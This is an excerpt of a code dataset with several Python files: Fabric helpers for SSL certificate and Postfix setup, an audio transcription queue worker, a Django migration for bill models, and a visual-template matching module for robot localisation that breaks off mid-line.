ensure_ssl_key(ssl_key, ssl_csr, ssl_conf, ssl_cert, ssl_intermediate_cert,\n ssl_intermediate_cert_url, ssl_options):\n \"\"\"Make sure an SSL certificate exists.\n\n - ``ssl_key``: filename of the private key (will be generated if missing)\n - ``ssl_csr``: filename of the certificate signing request (will be\n generated if needed)\n - ``ssl_conf``: filename of the ssl configuration file (will be generated\n using ``ssl_options`` if needed and missing)\n - ``ssl_cert``: filename of the SSL certificate (alas this one cannot be\n generated automatically)\n - ``ssl_intermediate_cert``: filename of the SSL intermediate certificate\n (will be downloaded if missing)\n - ``ssl_intermediate_cert_url``: URL for downloading the intermediate\n certificate (e.g. 
STARTSSL_INTERMEDIATE_URL)\n - ``ssl_options``: a dictionary defining SSL certificate signing request\n generation options, specifically, the arguments to be passed to\n ``generate_ssl_config()`` -- country, state, locality, organization,\n organizational_unit, common_name, and email.\n\n \"\"\"\n if not exists(ssl_key, use_sudo=True):\n if not exists(ssl_conf):\n generate_ssl_config(ssl_conf, **ssl_options)\n generate_ssl_key(ssl_key, ssl_csr, ssl_conf)\n if not exists(ssl_csr):\n if not exists(ssl_conf):\n generate_ssl_config(ssl_conf, **ssl_options)\n generate_ssl_csr(ssl_key, ssl_csr, ssl_conf)\n if not exists(ssl_intermediate_cert):\n download_file(ssl_intermediate_cert, ssl_intermediate_cert_url)\n if not exists(ssl_cert):\n changelog_append('# aborting: {ssl_cert} is missing'.format(ssl_cert=ssl_cert))\n with quiet():\n csr = run('cat {ssl_csr}'.format(ssl_csr=ssl_csr))\n abort(\"{ssl_cert} is missing, please generate it using {ssl_csr}:\\n\\n{csr}\".format(\n ssl_cert=ssl_cert, ssl_csr=ssl_csr, csr=csr))\n\n\ndef generate_ssl_config(conffile, country, state, locality, organization,\n organizational_unit, common_name, email):\n \"\"\"Generate a config file for SSL certificates.\n\n Example::\n\n generate_ssl_config('/etc/pov/sslreq.conf',\n country='LT', state='.', locality='Vilnius',\n organization='POV', organizational_unit='.',\n common_name='www.example.com',\n email='root@example.com')\n\n \"\"\"\n assert_shell_safe(conffile)\n config = textwrap.dedent(\"\"\"\\\n [ req ]\n default_bits = 2048\n default_keyfile = privkey.pem\n distinguished_name = req_distinguished_name\n prompt = no\n\n [ req_distinguished_name ]\n countryName = {country}\n stateOrProvinceName = {state}\n localityName = {locality}\n organizationName = {organization}\n organizationalUnitName = {organizational_unit}\n commonName = {common_name}\n emailAddress = {email}\n \"\"\").format(country=country, state=state, locality=locality,\n organization=organization,\n organizational_unit=organizational_unit,\n common_name=common_name, email=email)\n if upload_file(StringIO(config), conffile):\n changelog_append(\"# generated {conffile}\".format(conffile=conffile))\n\n\ndef generate_ssl_key(keyfile, csrfile, conffile):\n \"\"\"Generate a new private SSL key and certificate signing request.\n\n Uses modern defaults for 2015: 2048-bit RSA, SHA-256 signature.\n \"\"\"\n assert_shell_safe(keyfile, csrfile, conffile)\n changelog_append(\"# generated {keyfile} and {csrfile}\".format(\n keyfile=keyfile, csrfile=csrfile))\n sudo(\"openssl req -config {conffile} -newkey rsa:2048 -nodes\"\n \" -keyout {keyfile} -sha256 -out {csrfile}\".format(\n keyfile=keyfile, csrfile=csrfile, conffile=conffile))\n\n\ndef generate_ssl_csr(keyfile, csrfile, conffile):\n \"\"\"Generate a new certificate signing request for a given SSL private key.\n\n Uses modern defaults for 2015: SHA-256 signature.\n \"\"\"\n assert_shell_safe(keyfile, csrfile, conffile)\n changelog_append(\"# generated {csrfile}\".format(csrfile=csrfile))\n sudo(\"openssl req -config {conffile} -new -key {keyfile} -sha256\"\n \" -out {csrfile}\".format(\n keyfile=keyfile, csrfile=csrfile, conffile=conffile))\n\n\n#\n# Postfix\n#\n\ndef install_postfix_virtual_table(local, remote, changelog_append=True):\n \"\"\"Upload a Postfix virtual table and install it.\n\n Takes care of\n - uploading the local file to remote\n - file permissions and ownership (0644, root:root)\n - running postmap\n - adding the table to /etc/postfix/main.cf virtual_maps\n - making sure that postfix 
accepts outside connections\n (inet_interfaces != loopback-only)\n - changelog updates for all of the above\n\n If ``changelog_append`` is False creates a new timestamped header.\n If it's True, appends to the current message.\n \"\"\"\n assert_shell_safe(remote)\n if upload_file(local, remote):\n changelog('# updated {remote}'.format(remote=remote),\n append=changelog_append)\n run_and_changelog(\"postmap {remote}\".format(remote=remote))\n # consider running postmap if the file exists and hasn't changed but the\n # corresponding .map file is missing or outdated\n add_postfix_virtual_map('hash:' + remote)\n make_postfix_public()\n\n\ndef get_postfix_setting(setting):\n \"\"\"Get the current value of a postfix setting\"\"\"\n assert_shell_safe(setting)\n with quiet():\n current_setting = run(\"postconf -h {setting}\".format(setting=setting))\n if current_setting.startswith('postconf: warning:'):\n # assume \"postconf: warning: {setting}: unknown parameter\"\n current_setting = ''\n return current_setting\n\n\ndef parse_postfix_setting(current_setting):\n \"\"\"Parse a comma-separated postfix setting.\n\n Returns a list of (non-empty) strings.\n \"\"\"\n return filter(None, map(str.strip, current_setting.split(',')))\n\n\ndef add_postfix_virtual_map(entry):\n \"\"\"Add an entry to postfix's virtual_maps.\n\n Takes care to\n - preserve preexisting virtual maps\n - reload postfix's configurationa after changing it\n - document all the changes in the changelog\n\n Idempotent: does nothing if entry is already included in virtual_maps.\n \"\"\"\n assert_shell_safe(entry, extra_allow=':')\n current_setting = get_postfix_setting('virtual_alias_maps')\n if current_setting != '$virtual_maps':\n # TBH maybe we should ignore the legacy $virtual_maps and instead\n # just use $virtual_alias_maps?\n abort(\"Unexpected virtual_alias_maps setting ({})\".format(current_setting))\n add_postfix_setting('virtual_maps', entry)\n\n\ndef add_postfix_setting(setting, entry, reload_postfix=True):\n \"\"\"Add an entry to a comma-separated postfix setting.\n\n Takes care to\n - preserve preexisting values\n - reload postfix's configuration after changing it\n - document all the changes in the changelog\n\n Idempotent: does nothing if entry is already included in the setting.\n\n Returns True if the setting was modified, False if it was untouched.\n \"\"\"\n assert_shell_safe(setting)\n assert_shell_safe(entry, extra_allow=':')\n old_value = get_postfix_setting(setting)\n items = parse_postfix_setting(old_value)\n if entry in items:\n return False\n else:\n items.append(entry)\n new_value = ', '.join(items)\n if \"'\" in new_value:\n abort(\"Cannot handle apostrophes in {setting} setting ({old_value}),\"\n \" not touching anything!\".format(setting=setting,\n old_value=old_value))\n changelog_append('# adding {entry} to {setting} in /etc/postfix/main.cf'.format(\n entry=entry, setting=setting))\n res = run_and_changelog(\"postconf {setting}='{new_value}'\".format(\n setting=setting, new_value=new_value))\n if res.startswith(\"postconf: warning:\"):\n # Uhh on Ubuntu 10.04 postconf can't handle non-standard variables at all\n changelog_append(\" | %s\" % res.rstrip())\n abort(\"Your version of postconf ignores unknown settings; you'll have to edit /etc/postfix/main.cf and reload postfix manually.\")\n if reload_postfix:\n run_and_changelog(\"postfix reload\")\n return True\n\n\ndef make_postfix_public():\n \"\"\"Make sure postfix accepts connections from outside.\n\n Takes care to\n - restart postfix if necessary\n - 
document all the changes in the changelog\n \"\"\"\n with quiet():\n current_setting = run(\"postconf -h inet_interfaces\")\n if current_setting == 'loopback-only':\n run_and_changelog(\"postconf inet_interfaces=all\")\n run_and_changelog(\"service postfix restart\")\n\n\n#\n# pov-admin-tools\n#\n\ndef has_new_changelog_message():\n \"\"\"Check if new-changelog-entry is installed.\n\n (You can get it by installing pov-admin-tools.)\n \"\"\"\n return (exists('/usr/sbin/new-changelog-entry') or\n exists('/usr/local/sbin/new-changelog-entry'))\n\n\ndef changelog(message, context=None, append=False, optional=True):\n \"\"\"Append a message to /root/Changelog, with a timestamped header.\n\n Depends on pov-admin-tools. If it's not installed, skips the\n message (unless you say optional=False, in which case it aborts\n with an error).\n\n By default the message gets a timestamped header. Use append=True\n to append to an existing message instead of starting a new one.\n\n If context is given, message will be formatted using given context\n (``message = message.format(**context)``).\n \"\"\"\n # NB: no assert_shell_safe(): quote() ought to take care of everything.\n if not optional or has_new_changelog_message():\n cmd = 'new-changelog-entry'\n if append:\n cmd += ' -a'\n if context is not None:\n message = message.format(**context)\n cmd += ' ' + quote(message)\n run_as_root(cmd)\n\n\ndef changelog_append(message, context=None, optional=True):\n \"\"\"Append a message to /root/Changelog.\n\n Shortcut for changelog(message, append=True).\n \"\"\"\n changelog(message, context, append=True, optional=optional)\n\n\ndef changelog_banner(message, context=None, optional=True):\n \"\"\"Append a banner message to /root/Changelog.\"\"\"\n changelog(\"#\\n # %s\\n #\" % message, context, optional=optional)\n\n\ndef run_and_changelog(command, append=True):\n \"\"\"Run a command and also append it to /root/Changelog\"\"\"\n changelog(command, append=append)\n return run_as_root(command)\n\n\ndef run_as_root(command):\n \"\"\"Run a command as root; use sudo only if necessary.\"\"\"\n current_user = env.host_string.rpartition('@')[0] or env.user\n if current_user != 'root':\n return sudo(command, user='root')\n else:\n return run(command)\n\n\n#\n# Instance management\n#\n\n\nclass Instance(dict):\n \"\"\"Service instance configuration.\n\n Subclass to add more parameters, e.g. ::\n\n from pov_fabric import Instance as BaseInstance\n\n class Instance(BaseInstance):\n def __init__(self, name, host, home='/opt/project'):\n super(Instance, self).Instance.__init__(name, host)\n self.home = home\n\n Or use the ``with_params()`` classmethod.\n \"\"\"\n\n def __init__(self, name, host, **kwargs):\n # This trick lets us access dict keys as if they were object attributes\n # and vice versa.\n self.__dict__ = self\n self.name = name\n self.host = host\n self.__dict__.update(kwargs)\n\n def _asdict(self):\n \"\"\"(DEPRECATED) Return the instance parameters as a dict.\n\n Useful for string formatting, e.g. 
::\n\n print('{name} is on {host}'.format(**instance._asdict()))\n\n but since now you can do ::\n\n print('{name} is on {host}'.format(**instance))\n\n this method is pointless and is retained for backwards compatibility\n only.\n\n Mimics the API of ``collections.namedtuple``.\n \"\"\"\n return self\n\n REQUIRED = object()\n\n @classmethod\n def with_params(cls, **params):\n \"\"\"Define an instance subclass\n\n Usage example::\n\n from pov_fabric import Instance as BaseInstance\n\n Instance = BaseInstance.with_params(\n required_arg1=BaseInstance.REQUIRED,\n optional_arg1='default value',\n optional_arg2=None)\n\n \"\"\"\n\n def __init__(self, name, host, **kw):\n super(new_cls, self).__init__(name, host)\n for k, v in params.items():\n if v is cls.REQUIRED and k not in kw:\n raise TypeError(\n \"__init__() requires a keyword argument '{}'\"\n .format(k))\n setattr(self, k, v)\n for k, v in kw.items():\n if k not in params:\n raise TypeError(\n \"__init__() got an unexpected keyword argument '{}'\"\n .format(k))\n setattr(self, k, v)\n new_cls = type('Instance', (cls, ), dict(__init__=__init__))\n return new_cls\n\n @classmethod\n def define(cls, *args, **kwargs):\n \"\"\"Define an instance.\n\n Creates a new Instance object with the given constructor arguments,\n registers it in env.instances and defines an instance selector task.\n \"\"\"\n instance = cls(*args, **kwargs)\n _define_instance(instance)\n _define_instance_task(instance.name, stacklevel=2)\n\n @classmethod\n def define_alias(cls, alias, name):\n \"\"\"Define an alias for an instance.\n\n Defines an instance selector task named ``alias`` that selects an\n instance named ``name``.\n\n Usage example::\n\n Instance.define_alias('prod', 'srv1.example.com')\n\n \"\"\"\n _define_instance_task(alias, name, stacklevel=2)\n\n\ndef _define_instance(instance):\n \"\"\"Define an instance.\n\n Instances are stored in the ``env.instances`` dictionary, which is created\n on demand.\n \"\"\"\n if not _valid_task_name(instance.name):\n abort(\"'{name}' is not a valid instance name.\".format(name=instance.name))\n if not hasattr(env, 'instances'):\n env.instances = {}\n if instance.name in env.instances:\n abort(\"Instance {name} is already defined.\".format(name=instance.name))\n env.instances[instance.name] = instance\n\n\ndef _define_instance_task(name, instance_name=None, stacklevel=1):\n \"\"\"Define an instance task\n\n This task will set env.instance to the name of the task.\n \"\"\"\n if not _valid_task_name(name):\n abort(\"'{name}' is not a valid task name.\".format(name=name))\n if instance_name is None:\n instance_name = name\n def fn():\n env.instance = instance_name\n fn.__doc__ = \"\"\"Select instance '%s' for subsequent tasks.\"\"\" % instance_name\n instance_task = task(name=name)(fn)\n fn_name = _pythonify_name(name)\n module_globals = sys._getframe(stacklevel).f_globals\n while fn_name in module_globals:\n fn_name += '_'\n module_globals[fn_name] = instance_task\n\n\ndef _valid_task_name(name):\n \"\"\"Check if ``name`` is a valid Fabric task name\"\"\"\n if not name:\n return False\n if name.startswith('-'):\n return False\n if ' ' in name:\n return False\n if ':' in name:\n return False\n if '.' 
in name:\n return False\n return True\n\n\ndef _pythonify_name(name):\n \"\"\"Coerce the name to a valid Python identifier\"\"\"\n name = ''.join(c if c.isalnum() else '_' for c in name)\n if name[:1].isdigit():\n name = '_' + name\n return name\n\n\ndef get_instance(instance_name=None):\n \"\"\"Select the instance to operate on.\n\n Defaults to env.instance if instance_name is not specified.\n\n Aborts with a help message if the instance is not defined.\n \"\"\"\n instances = sorted(getattr(env, 'instances', {}))\n if not instances:\n abort(\"There are no instances defined in env.instances.\")\n if not instance_name:\n instance_name = getattr(env, 'instance', None)\n try:\n return env.instances[instance_name]\n except KeyError:\n abort(\"Please specify an instance ({known_instances}), e.g.\\n\\n\"\n \" fab {instance} {command}\".format(\n known_instances=\", \".join(instances),\n instance=instances[0],\n command=env.command))\n","sub_path":"pov_fabric.py","file_name":"pov_fabric.py","file_ext":"py","file_size_in_byte":42103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"389803125","text":"from alex_asr import Decoder\nimport wave\nimport json\nimport os\nimport worker_lib.s3 as s3\nfrom worker_lib.queue import watch_queue\nimport worker_lib.db_op as db\n\nprint('Initialising decoder')\nDECODER = Decoder('/opt/app/model/')\n\nUPLOADS_DIR = '/opt/app/uploads/'\n\ndef transcribe(filename):\n \n data = wave.open(UPLOADS_DIR + filename, \"rb\")\n \n try:\n frames = data.readframes(data.getnframes())\n finally:\n data.close()\n\n # Feed the audio data to the decoder.\n DECODER.accept_audio(frames)\n DECODER.decode(data.getnframes()) # transcribe\n DECODER.input_finished()\n\n # Get and print the best hypothesis.\n prob, word_ids = DECODER.get_best_path()\n\n result = \" \".join(DECODER.get_word(word_id).decode('utf-8') for word_id in word_ids)\n\n # Get timings\n alignment = DECODER.get_time_alignment() # returns sequence (tuple) of lists\n\n # Create list of word tuples\n words_with_alignment = [(DECODER.get_word(w).decode('utf-8'), t, d) for (w,t,d) in zip(*alignment)]\n DECODER.reset()\n\n return result, words_with_alignment\n\n\ndef handle_message(ch, method, properties, body):\n body = body.decode('utf-8')\n msg = json.loads(body)\n file_id = msg['id']\n filename = msg['audio_file']\n\n driver = os.environ['FILE_DRIVER']\n\n try:\n if driver == 's3':\n print('Using S3 for file ' + 'uploads/' + filename)\n s3.download_file('uploads/' + filename, UPLOADS_DIR + filename)\n\n db.update_status(file_id, filename, 'Transcribing')\n result, words_with_alignment = transcribe(filename)\n\n db.update_status(file_id, filename, 'Writing transcription to DB')\n db.save_transcription(file_id, result, words_with_alignment)\n\n db.update_status(file_id, filename, 'Transcription complete')\n ch.basic_ack(delivery_tag=method.delivery_tag)\n\n msg['words_with_alignment'] = words_with_alignment\n msg_str = json.dumps(msg)\n print(\"words_with_alignment: \" + str(words_with_alignment))\n ch.basic_publish(\n exchange='',\n routing_key=\"punctuation.\" + os.environ['QUEUE_NAME'],\n body=msg_str\n )\n print(\"Message sent\")\n\n except Exception as e:\n db.mark_transcription_failed(file_id)\n db.update_status(file_id, filename, \"Transcription failed: {0}\".format(e))\n ch.basic_reject(delivery_tag=method.delivery_tag, requeue=False)\n\n finally:\n if driver == 's3':\n if os.path.exists(UPLOADS_DIR + filename):\n os.remove(UPLOADS_DIR + filename) # Remove 
temp file\n\n\nwatch_queue(os.environ['QUEUE_NAME'], handle_message)\n","sub_path":"workers/ASR/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"77480145","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='BillAuthor',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=50)),\n ('institute', models.BooleanField(default=True)),\n ('person', models.BooleanField(default=False)),\n ('first_name', models.CharField(max_length=30, null=True, blank=True)),\n ('last_name', models.CharField(max_length=50, null=True, blank=True)),\n ],\n options={\n 'ordering': ('name',),\n },\n ),\n migrations.CreateModel(\n name='Bills',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(unique=True, max_length=b'350')),\n ('description', models.TextField(null=True, blank=True)),\n ('state', models.CharField(default=b'CO', max_length=2, choices=[(b'OP', b'Open'), (b'CL', b'Closed'), (b'CO', b'Construction')])),\n ('consequences', models.TextField(null=True, blank=True)),\n ('author', models.ManyToManyField(to='bills.BillAuthor')),\n ],\n options={\n 'ordering': ('title',),\n },\n ),\n ]\n","sub_path":"bills/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"318809814","text":"\n# -------------------------------------------------------------------[ header ]\n\nimport numpy as np\nfrom ._globals import *\n\n# ------------------------------------------------------------[ VisualTemplate class ]\n\nclass VisualTemplate(object):\n def __init__(self, id, data, current_mean):\n self.id = id\n self.data = data[:]\n self.mean = current_mean\n\n# ------------------------------------------------------------[ LocalViewMatch class ]\n\nclass LocalViewMatch(object):\n def __init__(self):\n '''\n templates: 1D numpy array that stores all visual templates created\n\n current-view: 1D numpy array that stores the current template relative\n to the current frame\n\n current-mean: current mean of the template current-view\n\n current-vt: id of the current visual template\n\n vt-error: current error between the current visual template and the\n closest visual template\n\n prev-vt: id of the previous visual template\n\n vt-relative-rad: relative facing angle between closest visual template\n and current visual template\n\n view-rgb: store the current frame captured by the robot\n\n greyscale: controls if the image is in grayscale\n '''\n\n \n self.templates = np.array([])\n self.current_view = np.zeros(TEMPLATE_SIZE)\n self.current_mean = 0\n self.current_vt = 0\n self.vt_error = 0\n self.prev_vt = 0\n self.vt_relative_rad = 0\n\n self.IMAGE_VT_X_RANGE_MAX = IMAGE_VT_X_RANGE_MAX\n self.IMAGE_VT_X_RANGE_MIN = IMAGE_VT_X_RANGE_MIN\n\n self.view_rgb = np.array([])\n self.greyscale = True\n \n\n def on_image(self, view_rgb, greyscale):\n '''\n Purpose: This routine compare a visual template to all the stored templates,\n returning the matching template and the error between these two\n\n 
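Example (illustrative; frame stands for any 2D greyscale numpy array)::\n\n lvm = LocalViewMatch()\n matched = lvm.on_image(frame, True)\n lvm.current_vt # id of the matched or newly created template\n lvm.vt_relative_rad # relative facing angle to the match\n\n 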
Algorithm: Convert the current frame to a template. Then, compare the current\n template to all stored templates. Finally, check if error between the closest\n template found is enough for consider this a matching template\n\n Inputs:\n view_rgb: current frame captured by the robot\n greyscale: True if the current frame is on grayscale, False if the\n current frame is not on grayscale\n\n Outputs: True, if a mathed visual template was found, otherwise, False\n '''\n if( view_rgb.size == 0 ):\n return False\n\n # first: store the current frame\n self.view_rgb = view_rgb[:]\n self.greyscale = greyscale\n\n # second: convert the current frame to a template and update the prev_vt value\n\n # Matheus: converts to a template size sum y and x values in blocks and normalize them.\n self.current_view = self.__convert_view_to_view_template__( greyscale )\n\n self.prev_vt = self.current_vt\n\n # third: compare the current template to all stored templates\n vt_match_id = 0\n self.vt_error, vt_match_id = self.__compare__( self.vt_error, vt_match_id )\n\n # finally: if error between the closest template found is enough for\n # consider this a matching template\n #print \"error: \" + str(self.vt_error)\n if ( self.vt_error <= VT_MATCH_THRESHOLD ):\n \n self.__set_current_vt__( vt_match_id )\n return True\n else:\n self.vt_relative_rad = 0\n self.__set_current_vt__( self.__create_template__() )\n return False\n \n\n # def on_image_merge(self, view_rgb, greyscale):\n def on_image_merge(self, template_view, template_mean):\n '''\n Purpose: This routine compare a visual template to all the stored templates,\n returning the matching template and the error between these two without create\n new or set any previous templates.\n\n Algorithm: Convert the current frame to a template. Then, compare the current\n template to all stored templates. 
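(Unlike on_image(), a miss here does not create a new template, and the\n routine returns a (matched, vt_match_id) tuple rather than a bare\n boolean.) 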
Finally, check if error between the closest\n template found is enough for consider this a matching template\n\n Inputs:\n view_rgb: current frame captured by the robot\n greyscale: True if the current frame is on grayscale, False if the\n current frame is not on grayscale\n\n Outputs: True, if a mathed visual template was found, otherwise, False\n '''\n # if( view_rgb.size == 0 ):\n # return False\n\n # first: store the current frame\n # self.view_rgb = view_rgb[:]\n # self.greyscale = greyscale\n\n # second: convert the current frame to a template and update the prev_vt value\n\n # Matheus: converts to a template size sum y and x values in blocks and normalize them.\n # self.current_view = self.__convert_view_to_view_template__( greyscale )\n self.current_view = template_view\n self.current_mean = template_mean\n\n self.prev_vt = self.current_vt\n\n # third: compare the current template to all stored templates\n vt_match_id = -1\n self.vt_error, vt_match_id = self.__compare__( self.vt_error, vt_match_id )\n\n # finally: if error between the closest template found is enough for\n # consider this a matching template\n \n if ( self.vt_error <= VT_MATCH_THRESHOLD ):\n return True, vt_match_id\n else:\n return False, vt_match_id\n\n\n def __clip_view_x_y__(self,x,y):\n '''\n Purpose: This routine verifies if the value of x and y coordinates are in\n a valid range (between 0 and TEMPLATE-X-SIZE or TEMPLATE-Y-SIZE), and if\n they are not, corrected their value.\n\n Algorithm: Verifies if the value of x and y coordinates are in a valid\n range (between 0 and TEMPLATE-X-SIZE or TEMPLATE-Y-SIZE), and if they\n are not, correct their values to 0 or TEMPLATE-SIZE, depending which\n one is closer to the current value of x and y.\n\n Inputs:\n x: x coordinate\n y: y coordinate\n\n Outputs: x and y updated\n '''\n if x < 0:\n x = 0\n elif x > TEMPLATE_X_SIZE - 1:\n x = TEMPLATE_X_SIZE - 1\n\n if y < 0:\n y = 0\n elif y > TEMPLATE_Y_SIZE - 1:\n y = TEMPLATE_Y_SIZE - 1\n\n return x,y\n\n\n def __convert_view_to_view_template__(self, grayscale):\n '''\n Purpose: This routine transforms the current frame in a 1D array normalized\n that can be used as a template.\n\n Algorithm: It first defines the ranges of the current frame (self.view-rgb)\n that are going to be used. Then it sums blocks of pixels of\n size x-block-size * y-block-size. Then, the resulting array is divided\n by x-block-size * y-block-size and by 255, if it is a grayscale frame.\n In case it is used an RGB frame, the algorithm is the same, however,\n the current view is also divided by 3. If VT-NORMALISATION > 0, all\n values will be normalized by this value. 
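As a worked example with illustrative sizes: a 400x300 crop mapped onto\n a 40x30 template makes each template cell the average of a 10x10 pixel\n block, scaled by 1/255 into [0, 1]. 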
Finally, the current mean is\n calculated.\n\n Inputs:\n greyscale: True if the current frame is on grayscale, False if the\n current frame is not on grayscale.\n\n Outputs: numpy array of 1D (TEMPLATE-X-SIZE * TEMPLATE-Y-SIZE) normalized\n '''\n sub_range_x = IMAGE_VT_X_RANGE_MAX - IMAGE_VT_X_RANGE_MIN\n sub_range_y = IMAGE_VT_Y_RANGE_MAX - IMAGE_VT_Y_RANGE_MIN\n\n x_block_size = sub_range_x / TEMPLATE_X_SIZE\n y_block_size = sub_range_y / TEMPLATE_Y_SIZE\n\n # first: select the part of the frame that is going to be used\n #self.current_view = self.view_rgb[ IMAGE_VT_Y_RANGE_MIN : IMAGE_VT_Y_RANGE_MAX, IMAGE_VT_X_RANGE_MIN : IMAGE_VT_X_RANGE_MAX ]\n self.current_view = np.zeros(TEMPLATE_SIZE)\n\n if grayscale:\n\n y_block_count = 0\n x_block_count = 0\n data_next = 0\n for y_block in range(IMAGE_VT_Y_RANGE_MIN, IMAGE_VT_Y_RANGE_MAX, int(y_block_size)): # Change Python 3 - Paulo \n for x_block in range(IMAGE_VT_X_RANGE_MIN, IMAGE_VT_X_RANGE_MAX, int(x_block_size)): # Change Python 3 - Paulo \n for x in range(x_block, x_block + int(x_block_size)): # Change Python 3 - Paulo \n for y in range(y_block, y_block + int(y_block_size)):\n self.current_view[data_next] += self.view_rgb[y][x]\n self.current_view[data_next] /= 255.0\n self.current_view[data_next] /= (x_block_size * y_block_size)\n data_next+=1\n x_block_count+=1\n y_block_count+=1\n\n '''\n # second: reshape the vector with y rows to y_block rows and sum the values in y-axis\n self.current_view = np.sum( self.current_view.reshape( y_block_size, TEMPLATE_Y_SIZE * sub_range_x ),0 )\n # third: reshape the vector with 1 row to x_block_size rows\n self.current_view = self.current_view.reshape( x_block_size, TEMPLATE_X_SIZE * TEMPLATE_Y_SIZE )\n # finally: sum all values in y-axis and divide all by 255 * x_block_size * y_block_size\n self.current_view = np.sum( self.current_view , 0 )/( 255.0 * x_block_size * y_block_size )\n '''\n else:\n self.current_view = self.current_view.reshape( sub_range_y, 3 * sub_range_x )\n self.current_view = np.sum( self.current_view.reshape( y_block_size, 3 * TEMPLATE_Y_SIZE * sub_range_x ), 0 )\n self.current_view = self.current_view.reshape( 3 * x_block_size,TEMPLATE_X_SIZE * TEMPLATE_Y_SIZE )\n self.current_view = np.sum( self.current_view, 0 ) / ( 3.0 * 255.0 * x_block_size * y_block_size )\n\n # just multiply all values by VT_NORMALISATION, divide all by the mean and\n # keep all values between 0 and 1\n if VT_NORMALISATION > 0:\n avg_value = np.mean( self.current_view )\n self.current_view = self.current_view * VT_NORMALISATION / avg_value\n self.current_view = np.minimum( self.current_view, 1.0 )\n self.current_view = np.maximum( self.current_view, 0.0 )\n\n # NOT USED\n # now do patch normalisation\n # +- patch size on the pixel, ie 4 will give a 9x9\n if VT_PATCH_NORMALISATION > 0:\n patch_size = VT_PATCH_NORMALISATION\n patch_total = (patch_size * 2 + 1) * (patch_size * 2 + 1)\n current_view_copy = self.current_view[:]\n\n for x in range(TEMPLATE_X_SIZE):\n for y in range(TEMPLATE_Y_SIZE):\n patch_sum = 0\n for patch_x in range(x - patch_size, x + patch_size + 1):\n for patch_y in range(y - patch_size, y + patch_size + 1):\n patch_x_clip, patch_y_clip = self.__clip_view_x_y__(patch_x, patch_y)\n patch_sum += current_view_copy[patch_x_clip + patch_y_clip * TEMPLATE_X_SIZE]\n patch_mean = patch_sum / patch_total\n patch_sum = 0\n for patch_x in range(x - patch_size, x + patch_size + 1):\n for patch_y in range(y - patch_size, y + patch_size + 1):\n patch_x_clip, patch_y_clip = 
self.__clip_view_x_y__(patch_x, patch_y)\n patch_sum += ((current_view_copy[patch_x_clip + patch_y_clip * TEMPLATE_X_SIZE] - patch_mean)* (current_view_copy[patch_x_clip + patch_y_clip * TEMPLATE_X_SIZE] - patch_mean))\n\n patch_std = np.sqrt(patch_sum / patch_total)\n if ( patch_std < VT_MIN_PATCH_NORMALISATION_STD ):\n self.current_view[x + y * TEMPLATE_X_SIZE] = 0.5\n else:\n self.current_view[x + y * TEMPLATE_X_SIZE] = max(0, min(1.0, (((current_view_copy[x + y * TEMPLATE_X_SIZE] - patch_mean) / patch_std) + 3.0)/6.0 ))\n\n # find the current mean\n self.current_mean = np.mean(self.current_view)\n\n return self.current_view\n\n\n def __set_current_vt__(self, current_vt):\n '''\n Purpose: This routine updates the current visual template (current-vt).\n\n Algorithm: Verifies if the current-vt is different from the input, if\n it is, updates the prev-vt and current-vt values, if it is not, just\n updates the current-vt.\n\n Inputs:\n current-vt: id of the current visual template\n\n Outputs: -\n '''\n if self.current_vt != current_vt:\n self.prev_vt = self.current_vt\n self.current_vt = current_vt\n\n def __create_template__(self):\n '''\n Purpose: This routine creates a new VisualTemplate ( Localview cell )\n and add this to the collection.\n\n Algorithm: Create a new VisualTemplate object that stores the current\n frame and the current mean of this frame. Then, this new VisualTemplate\n is added to the collection.\n\n Inputs: -\n\n Outputs: Id of the VisualTemplate created\n '''\n newcell = VisualTemplate( self.templates.size, # template id\n self.current_view,\n self.current_mean )\n\n # Add newcell to the collection\n self.templates = np.append(self.templates, newcell)\n\n return self.templates.size -1\n\n # @cuda.jit('float32,int32(float32, int32)')\n def __compare__(self, vt_err, vt_match_id):\n '''\n Purpose: This routine compares a visual template to all the stored\n templates, returning the closest template and the error between these two.\n\n\n Algorithm: For each visual template, tries matching the view at different\n offsets. 
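The per-offset score is a plain sum of absolute differences between\n the shifted views, so the best candidate is the template/offset pair\n with the smallest accumulated cdiff. 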
After finding the smallest offset, calculates the error between\n these two visual templates, the matching id and the relative angle between\n them.\n\n Inputs:\n vt-err: variable that will store the error between two closest\n visual templates\n\n vt-match-id: variable that will store the closest template id\n\n Outputs: the error between the two matching visual templates and the\n id of the closest template\n '''\n if self.templates.size == 0:\n vt_err = DBL_MAX\n self.vt_error = vt_err\n return vt_err, vt_match_id\n\n mindiff = DBL_MAX # stores the smaller difference\n vt_err = DBL_MAX # stores the smaller error\n min_template = 0 # stores the id of the closest template\n epsilon = 0 #0.005\n min_offset = 0 # stores the relative facing direction angle between the closest templates\n\n # for each vt try matching the view at different offsets\n # handles 2d images shifting only in the x direction\n if VT_PANORAMIC:\n for vt in self.templates:\n if( abs( self.current_mean - vt.mean ) > VT_MATCH_THRESHOLD + epsilon ):\n continue\n for offset in range( 0, TEMPLATE_X_SIZE, VT_STEP_MATCH ):\n cdiff = 0\n columnAux = 0\n while columnAux < TEMPLATE_SIZE - offset:\n cdiff += np.sum( np.abs( self.current_view[ columnAux: columnAux + TEMPLATE_X_SIZE - offset]\n - vt.data[ columnAux + offset : columnAux + TEMPLATE_X_SIZE ] ) )\n cdiff += np.sum( np.abs( self.current_view[ columnAux + TEMPLATE_X_SIZE - offset : columnAux + TEMPLATE_X_SIZE ]\n - vt.data[ columnAux:columnAux + offset ] ) )\n columnAux += TEMPLATE_X_SIZE\n if cdiff < mindiff:\n mindiff = cdiff\n min_template = vt.id\n min_offset = offset\n\n # Matheus: get vt_relative_rad by min_offset value\n self.vt_relative_rad = min_offset / TEMPLATE_X_SIZE * 2.0 * np.pi\n\n if self.vt_relative_rad > 